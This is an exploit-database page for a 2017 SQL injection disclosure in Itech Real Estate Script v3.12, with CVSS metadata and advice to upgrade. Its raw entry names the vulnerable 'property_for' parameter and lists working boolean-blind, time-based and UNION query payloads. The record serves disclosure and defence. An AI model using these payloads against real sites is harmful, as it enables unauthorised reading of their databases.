header-logo
Suggest Exploit
vendor:
Real Estate Script
by:
Kaan KAMIS
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Real Estate Script
Affected Version From: v3.12
Affected Version To: v3.12
Patch Exists: YES
Related CWE: N/A
CPE: a:itechscripts:real_estate_script:3.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Itech Real Estate Script v3.12 – SQL Injection

An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read arbitrary data from the database. The vulnerable parameter is 'property_for' and the payloads used are boolean-based blind, AND/OR time-based blind and UNION query.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

Exploit Title: Itech Real Estate Script v3.12 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/real-estate-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.

Type of vulnerability:

An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
arbitrary data from the database.

Vulnerability:

http://localhost/real-estate-script/search_property.php?property_for=1[payload]

Parameter: property_for (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: property_for=1 AND 4574=4574

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: property_for=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo

Navigation

Suggest Exploit

Services By CQR